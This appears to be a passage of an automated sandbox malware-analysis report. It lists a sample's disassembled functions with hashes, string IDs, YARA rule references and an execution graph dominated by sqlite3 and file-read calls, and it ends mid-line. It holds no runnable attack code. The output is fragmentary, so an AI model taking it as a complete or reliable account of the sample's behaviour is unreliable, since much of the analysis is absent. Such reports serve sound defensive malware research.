                                                                                                  • Instruction ID: aed4c0fabc1f413561606ba98ce0c621ab552ffc25f53588bc97a39f69d0e587
                                                                                                  • Opcode Fuzzy Hash: 0cf01968fb0416cde34f274ef9e651dcd790f2ac07a296d84fb1e87a13ffa15e
                                                                                                  • Instruction Fuzzy Hash: 36C13FB1D01268AAEB60DFA4CD54BEEBBB8AF15304F0081DDD50CB7241E7B55A88CF95
                                                                                                  Function 04612622 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  • Opcode ID: b2227da5d84e9e058a8b49542177562cd4ea5a99854d64b607698450122be4c3
                                                                                                  • Instruction ID: f73522f044918ea4015c6fcc5103cce78e0cba4160981ef86c44ccfb10653e43
                                                                                                  • Opcode Fuzzy Hash: b2227da5d84e9e058a8b49542177562cd4ea5a99854d64b607698450122be4c3
                                                                                                  • Instruction Fuzzy Hash: AE7110B1D00228AAEB65DF94CC51FDEB77CAF14704F4085D9E50DAA180FBB46B888F65
                                                                                                  Function 04612619 Relevance: 16.4, Strings: 13, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  • Opcode ID: 2f791f9defee8460e7e66ec439dfeaeae0c879a99208495f02405192927e5abc
                                                                                                  • Instruction ID: b2f1abe1f0db9c76abce2c2cb769f2ec198ed21f267b2f1a6a6145e3074cfc72
                                                                                                  • Opcode Fuzzy Hash: 2f791f9defee8460e7e66ec439dfeaeae0c879a99208495f02405192927e5abc
                                                                                                  • Instruction Fuzzy Hash: 4C6122B1C00328AAEB61DF94CC50FDEB778AF54704F4085D9E50DAA180FBB46B888F55
                                                                                                  Function 046063C9 Relevance: 13.8, Strings: 11, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  • Opcode ID: 36e0108c31f08321ca762368f2d0b8bbaeb85c298a1a19bc502e6c1a8aa6e65e
                                                                                                  • Instruction ID: 650980a07cc38b2d2c32f74411448d819a4842c3502d186dd53326f9b040b588
                                                                                                  • Opcode Fuzzy Hash: 36e0108c31f08321ca762368f2d0b8bbaeb85c298a1a19bc502e6c1a8aa6e65e
                                                                                                  • Instruction Fuzzy Hash: 8331B6B1D01218BAEF10DFA4CC45BEEBBB9BF04704F00815DE6087B180EBB516488FA4
                                                                                                  Function 0460D78F Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                                  • API String ID: 0-620024284
                                                                                                  • Opcode ID: 3f3a663253f3d607156336e8a584d54e1ddcdc1462f5c7090b81b0de8b115336
                                                                                                  • Instruction ID: 159617d51b4901be033ecbd038bf821b3a7b95f10dae7dcecf4b9d94f25bc6f0
                                                                                                  • Opcode Fuzzy Hash: 3f3a663253f3d607156336e8a584d54e1ddcdc1462f5c7090b81b0de8b115336
                                                                                                  • Instruction Fuzzy Hash: 964193B5D00228B6EB20EBA0DD41FEF7378AF54704F0085DDA509A7140FAB5A7898FA5
                                                                                                  Function 0461A7F2 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                                  • API String ID: 0-3322591375
                                                                                                  • Opcode ID: 2b561b82ae07efc7f262c25c406e04e38491dce5583aab4ae65b8faaa5537e7c
                                                                                                  • Instruction ID: 8e5bf9561085e1239e4736b8ec9ab4e0456967642bca4a954bcaa356acfae0b0
                                                                                                  • Opcode Fuzzy Hash: 2b561b82ae07efc7f262c25c406e04e38491dce5583aab4ae65b8faaa5537e7c
                                                                                                  • Instruction Fuzzy Hash: 734174B2C11628AADB50DF94DC84BEEB7B8FF58314F05459ED909A7200F77066858F94
                                                                                                  Function 045FEBE2 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$&$0$^$k$l$s
                                                                                                  • API String ID: 0-3955182176
                                                                                                  • Opcode ID: c044bd9cbc13fcd2b0c071f3b13ed233c22e04fae2f32790d11bb063a30f6f88
                                                                                                  • Instruction ID: c60f13f23925c028846bae963c0c782a48c597ddcf4a77461a233caad7609a1b
                                                                                                  • Opcode Fuzzy Hash: c044bd9cbc13fcd2b0c071f3b13ed233c22e04fae2f32790d11bb063a30f6f88
                                                                                                  • Instruction Fuzzy Hash: 5611DE10D087CED9DB22CBBC88082AEBF711F23224F0887D9D5F02B2D6D275434697A6
                                                                                                  Function 046123EA Relevance: 7.7, Strings: 6, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  • Opcode ID: ce75db93e8005f08445aedec2c296d2568d215f592c2c83bd09247c8ef7fedce
                                                                                                  • Instruction ID: ebc0cef16f10b9c53ff528896ae1bdfcaa4ef5c3a6178275ba78d2efee3fd8f3
                                                                                                  • Opcode Fuzzy Hash: ce75db93e8005f08445aedec2c296d2568d215f592c2c83bd09247c8ef7fedce
                                                                                                  • Instruction Fuzzy Hash: 3B510470A00714ABEB34DF64CD44BEAB7B8BF54704F04499DE5096A290F7B4B584CFA5
                                                                                                  Function 04611B01 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: bfb84598a9054895757775ab3ab190b066a55e01d5a13464680932e09410dfe1
                                                                                                  • Instruction ID: 4e11b376b136655a138a8f2092884ae85ffd51dc2b4d51ac68a5bbcd7d1ae548
                                                                                                  • Opcode Fuzzy Hash: bfb84598a9054895757775ab3ab190b066a55e01d5a13464680932e09410dfe1
                                                                                                  • Instruction Fuzzy Hash: 5F613EB1A00304AFDB24DFA4CC80FEFB7B8AF89710F14455DE65AA7240E775BA418B60
                                                                                                  Function 04611B02 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: b0a0e90a1a9712c2c9924f8973c087b8fa3180785f4c20b59259edc613e2aa9b
                                                                                                  • Instruction ID: 665f920eab540a5cab47aefaff8c7b31e0a40d23bfdf109bd621276797e64c2e
                                                                                                  • Opcode Fuzzy Hash: b0a0e90a1a9712c2c9924f8973c087b8fa3180785f4c20b59259edc613e2aa9b
                                                                                                  • Instruction Fuzzy Hash: FD413DB1A00358AFDB20DFA4CC84FEFB7F9AF89704F14455DE659A7240E774AA418B60
                                                                                                  Function 04611792 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 2336c26278b3ae8fab14e7781892457724e43eff2f51f08ef59e66d2ba553e47
                                                                                                  • Instruction ID: 8deb8bdda8bf2be9258f49621a4a161d880c66d2c243e90c262cc20f3c8eb910
                                                                                                  • Opcode Fuzzy Hash: 2336c26278b3ae8fab14e7781892457724e43eff2f51f08ef59e66d2ba553e47
                                                                                                  • Instruction Fuzzy Hash: 1DB13CB5A00708AFDB24CFA4CC84FEFB7B9AF89704F14855DF659A7240E675AA01CB50
                                                                                                  Function 046120B7 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 78a4643caae2850f0c3a4963b8e706b55265526d4bedfb8f3727240e96031b29
                                                                                                  • Instruction ID: 037f3d5afee295d05c724b9cdd4432efc75b27134c94671a654f5563958bb985
                                                                                                  • Opcode Fuzzy Hash: 78a4643caae2850f0c3a4963b8e706b55265526d4bedfb8f3727240e96031b29
                                                                                                  • Instruction Fuzzy Hash: A38185B6C012687AEB25DB90CC51FEF737CAF58304F0085DDA509A6044FB746B868FA9
                                                                                                  Function 04611652 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  • Opcode ID: 32756e4007f5b493cdf90942bc671c35dd93b3a707bbde0dc3da0120e5e13943
                                                                                                  • Instruction ID: f246118a0d60f6e420271cd5cbdd3a4f88131e819d6b9ceddaec092d1f668651
                                                                                                  • Opcode Fuzzy Hash: 32756e4007f5b493cdf90942bc671c35dd93b3a707bbde0dc3da0120e5e13943
                                                                                                  • Instruction Fuzzy Hash: 744171B19116287AE712EF90CC55FFF773CEF65704F004589FA00AA181E7B46A018BEA
                                                                                                  Function 046120C2 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 1fed353d55d1be69079e6262f14f571558f00ede29407796c35591ef57d3aee2
                                                                                                  • Instruction ID: 5785026ad4cc9b98738cf178d6569b32f32da0a837c7413ec6020d16f3dbac56
                                                                                                  • Opcode Fuzzy Hash: 1fed353d55d1be69079e6262f14f571558f00ede29407796c35591ef57d3aee2
                                                                                                  • Instruction Fuzzy Hash: 684183B1C01368BAEB24DBA0CC51FDEB3BCAF58304F0085DDA109A6144FBB467458FA9
                                                                                                  Function 0460ED82 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: c61f41ef72bd45f35086c109433bb9af5d4552db42473458eafe9c3e69ea8a2b
                                                                                                  • Instruction ID: 28ea92148031ecbece75811445eaaf7a8e7099df5d4f5cae371b028e9c32db78
                                                                                                  • Opcode Fuzzy Hash: c61f41ef72bd45f35086c109433bb9af5d4552db42473458eafe9c3e69ea8a2b
                                                                                                  • Instruction Fuzzy Hash: 7EF012B090030CEBDB14DF85D889BDEBBBAFF09714F008108E5152B241D7B1A545CFA4

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0.4%
                                                                                                  Total number of Nodes:454
                                                                                                  Total number of Limit Nodes:60
                                                                                                  execution_graph 24114 61e306b2 24119 61e306e1 24114->24119 24120 61e306cb 24114->24120 24115 61e2bfea sqlite3_free sqlite3_str_vappendf 24115->24120 24116 61e308b2 24134 61e2bc7c sqlite3_free sqlite3_str_vappendf 24116->24134 24117 61e2bf44 sqlite3_free sqlite3_str_vappendf 24117->24120 24120->24115 24120->24116 24120->24117 24120->24119 24121 61e30559 17 API calls 24120->24121 24122 61e309dd 24120->24122 24123 61e30a24 24120->24123 24121->24120 24122->24116 24125 61e309ed 24122->24125 24123->24116 24123->24119 24132 61e30a50 24123->24132 24125->24119 24140 61e2bc7c sqlite3_free sqlite3_str_vappendf 24125->24140 24126 61e30b13 24135 61e2bc7c sqlite3_free sqlite3_str_vappendf 24126->24135 24131 61e13ed4 sqlite3_free sqlite3_free 24131->24132 24132->24119 24132->24125 24132->24126 24132->24131 24136 61e1515b 7 API calls 24132->24136 24137 61e2bf44 sqlite3_free sqlite3_str_vappendf 24132->24137 24138 61e301e2 17 API calls 24132->24138 24139 61e1142c 6 API calls 24132->24139 24134->24119 24135->24119 24136->24132 24137->24132 24138->24132 24139->24132 24140->24119 24141 61e3ddb2 24142 61e3ddc9 24141->24142 24145 61e3de12 24141->24145 24144 61e3de09 24142->24144 24142->24145 24171 61e09e74 sqlite3_free 24142->24171 24144->24145 24147 61e3de76 24144->24147 24172 61e12199 6 API calls 24144->24172 24147->24145 24148 61e3df7e 24147->24148 24156 61e3dec2 24147->24156 24161 61e3e003 24148->24161 24162 61e3dff7 24148->24162 24178 61e3dafa 20 API calls 24148->24178 24150 61e3df3e 24152 61e3df4b 24150->24152 24177 61e35080 7 API calls 24150->24177 24152->24145 24158 61e3501d 19 API calls 24152->24158 24153 61e3e1cc 24154 61e3e1dd 24153->24154 24153->24162 24184 61e09e74 sqlite3_free 24154->24184 24156->24150 24156->24152 24173 61e3501d 24156->24173 24158->24152 24159 61e3e1e7 24159->24162 24163 61e3e1f1 24159->24163 24161->24153 24161->24159 24179 61e13bb8 27 API calls 24161->24179 24180 61e3dafa 20 API calls 24161->24180 24168 61e3e172 24162->24168 24181 61e35080 7 API calls 24162->24181 24185 61e09e74 sqlite3_free 24163->24185 24164 61e3e1a5 24183 61e09e74 sqlite3_free 24164->24183 24168->24164 24182 61e3dafa 20 API calls 24168->24182 24171->24142 24172->24147 24174 61e35034 24173->24174 24175 61e35041 24174->24175 24186 61e34efe 24174->24186 24175->24156 24177->24152 24178->24148 24179->24161 24180->24161 24181->24168 24182->24168 24183->24145 24184->24145 24185->24145 24187 61e34f8b 24186->24187 24188 61e34f1d 24186->24188 24198 61e34dfc 8 API calls 24187->24198 24189 61e34f27 24188->24189 24190 61e34f9e 24188->24190 24194 61e34f89 24188->24194 24192 61e014e3 17 API calls 24189->24192 24195 61e014e3 24190->24195 24192->24194 24194->24175 24199 61e28e5f 24195->24199 24198->24188 24204 61e28e89 24199->24204 24200 61e28ef3 ReadFile 24201 61e28f1c 24200->24201 24200->24204 24208 61e28977 sqlite3_log 24201->24208 24203 61e0150a 24203->24194 24204->24200 24204->24201 24204->24203 24206 61e28f4f 24204->24206 24209 61e18126 sqlite3_win32_sleep 24204->24209 24210 61e27f25 14 API calls 24206->24210 24208->24203 24209->24204 24210->24203 24211 61e7c704 sqlite3_mutex_enter 24212 61e7c760 24211->24212 24221 61e7c843 24212->24221 24235 61e0f612 sqlite3_free 24212->24235 24213 61e7c93d 24274 61e0f612 sqlite3_free 24213->24274 24215 61e7c7a9 24236 61e13070 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 24215->24236 24216 61e7c94a 24275 61e2b4a0 11 API calls 24216->24275 24219 61e7c7ba 24237 61e628e3 24219->24237 24221->24213 24221->24216 24273 61e48e66 93 API calls 24221->24273 24223 61e7cc0c 24276 61e0f612 sqlite3_free 24223->24276 24226 61e7c810 24226->24221 24272 61e0f612 sqlite3_free 24226->24272 24227 61e7cc19 24277 61e13f3c sqlite3_free sqlite3_free 24227->24277 24231 61e7cc24 24278 61e0fc30 sqlite3_free 24231->24278 24234 61e7cc31 sqlite3_mutex_leave 24235->24215 24236->24219 24238 61e62914 24237->24238 24239 61e628fd 24237->24239 24279 61e62436 24238->24279 24250 61e62920 24239->24250 24283 61e03a76 sqlite3_stricmp 24239->24283 24242 61e6290a 24242->24250 24284 61e03b6d sqlite3_stricmp sqlite3_stricmp 24242->24284 24244 61e62b10 24295 61e2bc7c sqlite3_free sqlite3_str_vappendf 24244->24295 24245 61e62ae9 24294 61e2bc7c sqlite3_free sqlite3_str_vappendf 24245->24294 24246 61e62943 24249 61e6295f sqlite3_strnicmp 24246->24249 24252 61e629b9 24246->24252 24270 61e62a29 24246->24270 24251 61e62982 24249->24251 24249->24270 24250->24221 24250->24226 24271 61e2bc7c sqlite3_free sqlite3_str_vappendf 24250->24271 24285 61e03ff8 sqlite3_stricmp 24251->24285 24252->24250 24256 61e62a20 24252->24256 24257 61e62a2e 24252->24257 24252->24270 24254 61e6298d 24254->24270 24286 61e12677 11 API calls 24254->24286 24287 61e0f612 sqlite3_free 24256->24287 24288 61e22e95 8 API calls 24257->24288 24260 61e62a5b 24289 61e22e95 8 API calls 24260->24289 24262 61e62a66 24290 61e22e95 8 API calls 24262->24290 24264 61e62a7a 24291 61e2fa06 10 API calls 24264->24291 24266 61e62a95 24266->24250 24292 61e2bc7c sqlite3_free sqlite3_str_vappendf 24266->24292 24268 61e62ab7 24293 61e0f612 sqlite3_free 24268->24293 24270->24244 24270->24245 24270->24250 24271->24226 24272->24221 24273->24213 24274->24216 24275->24223 24276->24227 24277->24231 24278->24234 24280 61e62446 24279->24280 24281 61e6244a 24279->24281 24280->24239 24296 61e623a3 24281->24296 24283->24242 24284->24246 24285->24254 24286->24252 24287->24270 24288->24260 24289->24262 24290->24264 24291->24266 24292->24268 24293->24270 24294->24250 24295->24250 24297 61e623d9 24296->24297 24299 61e623cc 24296->24299 24302 61e62092 24297->24302 24300 61e62092 88 API calls 24299->24300 24301 61e623f0 24299->24301 24300->24299 24301->24280 24331 61e70a06 24302->24331 24307 61e62147 24308 61e62186 24307->24308 24358 61e3fd28 24307->24358 24317 61e621a9 24308->24317 24374 61e13372 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 24308->24374 24310 61e62160 24310->24308 24312 61e6216d 24310->24312 24373 61e11aa4 sqlite3_free 24312->24373 24314 61e6224a 24376 61e11aa4 sqlite3_free 24314->24376 24315 61e6222b 24315->24314 24318 61e6226f 24315->24318 24317->24314 24317->24315 24375 61e1375f sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 24317->24375 24377 61e2f943 sqlite3_str_vappendf 24318->24377 24319 61e6217e 24330 61e62135 24319->24330 24382 61e1493c sqlite3_free sqlite3_free sqlite3_free sqlite3_free 24319->24382 24323 61e622a2 sqlite3_exec 24378 61e0f612 sqlite3_free 24323->24378 24325 61e622f8 24326 61e62306 24325->24326 24379 61e61fb8 sqlite3_stricmp sqlite3_free sqlite3_str_vappendf sqlite3_exec 24325->24379 24327 61e62259 24326->24327 24380 61e14995 7 API calls 24326->24380 24327->24319 24327->24330 24381 61e4593a 71 API calls 24327->24381 24330->24299 24332 61e70a46 24331->24332 24333 61e70a30 24331->24333 24335 61e62111 24332->24335 24336 61e70a54 24332->24336 24337 61e70a5d sqlite3_strnicmp 24332->24337 24383 61e2f959 sqlite3_log sqlite3_str_vappendf 24333->24383 24335->24319 24335->24330 24349 61e13056 24335->24349 24385 61e2f959 sqlite3_log sqlite3_str_vappendf 24336->24385 24338 61e70b32 24337->24338 24339 61e70a91 24337->24339 24338->24336 24346 61e70b54 24338->24346 24341 61e70aa8 sqlite3_prepare 24339->24341 24342 61e70b25 sqlite3_finalize 24341->24342 24343 61e70aeb 24341->24343 24342->24335 24343->24342 24344 61e70aff 24343->24344 24345 61e70b11 sqlite3_errmsg 24343->24345 24344->24342 24384 61e2f959 sqlite3_log sqlite3_str_vappendf 24345->24384 24346->24335 24386 61e2f959 sqlite3_log sqlite3_str_vappendf 24346->24386 24350 61e1305f 24349->24350 24351 61e1306e 24349->24351 24350->24351 24352 61e12fe3 sqlite3_mutex_try 24350->24352 24351->24307 24353 61e12fff 24352->24353 24356 61e1300d 24352->24356 24353->24307 24354 61e13033 sqlite3_mutex_enter 24355 61e13026 24354->24355 24355->24353 24355->24354 24356->24354 24387 61e0286b sqlite3_mutex_leave 24356->24387 24359 61e13056 3 API calls 24358->24359 24369 61e3fd41 24359->24369 24361 61e40255 24361->24310 24363 61e4025a 24363->24361 24410 61e121b6 9 API calls 24363->24410 24364 61e3fe5d memcmp 24364->24369 24365 61e3feae memcmp 24365->24369 24366 61e4015f memcmp 24366->24369 24367 61e3ff33 memcmp 24367->24369 24369->24361 24369->24363 24369->24364 24369->24365 24369->24366 24369->24367 24388 61e3ee06 24369->24388 24406 61e91e88 8 API calls 24369->24406 24407 61e0b0a8 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 24369->24407 24408 61e139cb 15 API calls 24369->24408 24409 61e290d7 sqlite3_log 24369->24409 24373->24319 24375->24315 24376->24327 24377->24323 24378->24325 24379->24326 24381->24319 24382->24330 24383->24335 24384->24342 24385->24335 24386->24335 24387->24356 24398 61e3f16b 24388->24398 24400 61e3ee1e 24388->24400 24389 61e3f21d 24389->24369 24390 61e3f09c 24390->24389 24415 61e1280b sqlite3_free sqlite3_free 24390->24415 24393 61e014e3 17 API calls 24394 61e3f0d5 24393->24394 24394->24390 24395 61e3f0f0 memcmp 24394->24395 24399 61e3f10e 24395->24399 24396 61e3f04f 24396->24390 24405 61e3ef29 24396->24405 24412 61e3e20a 39 API calls 24396->24412 24398->24390 24414 61e35690 33 API calls 24398->24414 24399->24398 24413 61e91e88 8 API calls 24399->24413 24400->24390 24402 61e014e3 17 API calls 24400->24402 24403 61e3ee44 24400->24403 24400->24405 24402->24403 24403->24390 24403->24396 24403->24405 24411 61e2ab6e sqlite3_log 24403->24411 24405->24390 24405->24393 24405->24399 24406->24369 24407->24369 24408->24369 24409->24369 24410->24361 24411->24396 24412->24405 24413->24398 24414->24398 24415->24389 24416 61e90225 sqlite3_initialize 24417 61e90243 24416->24417 24423 61e902b4 24416->24423 24424 61e21415 10 API calls 24417->24424 24419 61e90291 24542 61e101d4 sqlite3_free 24419->24542 24420 61e9026e 24420->24419 24425 61e8f4d3 sqlite3_initialize 24420->24425 24424->24420 24426 61e901e7 24425->24426 24427 61e8f509 24425->24427 24426->24419 24543 61e11e9d 24427->24543 24429 61e8f55f 24430 61e901d9 24429->24430 24431 61e8f58b sqlite3_mutex_enter 24429->24431 24438 61e8f57e sqlite3_free 24429->24438 24432 61e9019c sqlite3_errcode 24430->24432 24546 61e2b996 24431->24546 24434 61e901ab sqlite3_close 24432->24434 24437 61e901b7 24432->24437 24436 61e901c2 sqlite3_free 24434->24436 24436->24426 24437->24436 24438->24430 24439 61e2b996 15 API calls 24440 61e8f6a0 24439->24440 24441 61e2b996 15 API calls 24440->24441 24442 61e8f6c8 24441->24442 24443 61e2b996 15 API calls 24442->24443 24444 61e8f6f0 24443->24444 24445 61e2b996 15 API calls 24444->24445 24446 61e8f718 24445->24446 24447 61e90191 sqlite3_mutex_leave 24446->24447 24557 61e11c6e 24446->24557 24447->24432 24450 61e8f75c 24638 61e38ca4 13 API calls 24450->24638 24451 61e8f750 24637 61e27c83 sqlite3_log 24451->24637 24454 61e8f75a 24455 61e8f781 24454->24455 24456 61e8f7c3 24454->24456 24639 61e2b4a0 11 API calls 24455->24639 24563 61e46abf 24456->24563 24460 61e8f809 24464 61e13056 3 API calls 24460->24464 24461 61e8f7ee 24463 61e0fc18 sqlite3_free 24461->24463 24462 61e8f7b3 sqlite3_free 24462->24447 24465 61e8f804 24463->24465 24466 61e8f814 24464->24466 24465->24447 24623 61e161ff 24466->24623 24468 61e8f821 24469 61e161ff 3 API calls 24468->24469 24470 61e8f84a 24469->24470 24470->24447 24627 61e0fc18 24470->24627 24473 61e8f89f 24474 61e8f8a6 sqlite3_errcode 24473->24474 24475 61e8f8ba 24474->24475 24518 61e8fbc9 24474->24518 24477 61e8fec2 24475->24477 24478 61e8f8c2 sqlite3_malloc 24475->24478 24476 61e8fbec 24476->24477 24483 61e8fca0 sqlite3_create_module 24476->24483 24481 61e8fed4 sqlite3_create_function 24477->24481 24495 61e8fff4 24477->24495 24478->24477 24480 61e8f8dc 24478->24480 24479 61e8fbda sqlite3_errcode 24479->24447 24479->24476 24640 61e27dff 15 API calls 24480->24640 24485 61e8ff1e sqlite3_create_function 24481->24485 24481->24495 24483->24477 24488 61e8fcca sqlite3_malloc 24483->24488 24484 61e900f5 24486 61e90100 24484->24486 24490 61e0fc18 sqlite3_free 24484->24490 24489 61e8ff68 sqlite3_create_function 24485->24489 24485->24495 24631 61e13552 24486->24631 24487 61e8f927 24487->24476 24491 61e8f931 sqlite3_create_function 24487->24491 24493 61e8fce5 24488->24493 24488->24495 24489->24495 24496 61e8ffae 24489->24496 24490->24486 24491->24476 24497 61e8f97b sqlite3_create_function 24491->24497 24643 61e1af62 8 API calls 24493->24643 24494 61e8fc02 sqlite3_mutex_enter 24494->24518 24495->24484 24500 61e9005c 24495->24500 24505 61e90018 sqlite3_create_function 24495->24505 24647 61e27dff 15 API 